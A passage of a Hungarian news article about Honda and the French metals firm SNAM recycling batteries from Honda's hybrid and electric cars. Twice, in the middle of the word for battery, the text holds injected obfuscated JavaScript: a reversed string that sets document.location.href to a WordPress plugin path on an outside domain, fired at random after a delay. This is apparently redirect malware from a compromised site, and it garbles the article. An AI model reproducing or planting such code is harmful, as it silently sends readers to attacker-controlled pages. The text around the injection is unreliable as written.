A kohászati cégből akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor-szakértővé avanzsált francia SNAM (Société Nouvelle d’Affinage des Métaux) lesz a partnere a Hondának abban a projektben, amelyben az autógyártó részben vagy teljesen elektromos modelleiből kinyert akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torokat hasznosítják újra. A Honda 2022-re minden alapmodelljéből kínál részben vagy teljesen elektromos verziót: a tavaly bevezetett CR-V Hybrid után idén itt a Honda e, hamarosan jön a Jazz e:HEV Hybrid is. Addig is, amíg ezek elöregszenek, ott vannak a régi, NiMH akkus modellek: az Insight, a CR-Z vagy a Civic Hybrid. A legkevésbé sincs tehát elkésve a Honda ezzel a projekttel, amelynek előkészítésén 2013 óta dolgoznak együtt a SNAM-mal. Az érintett akkukat 22 országból gyűjti össze a Honda, majd eldöntik,…
- Hirdetés -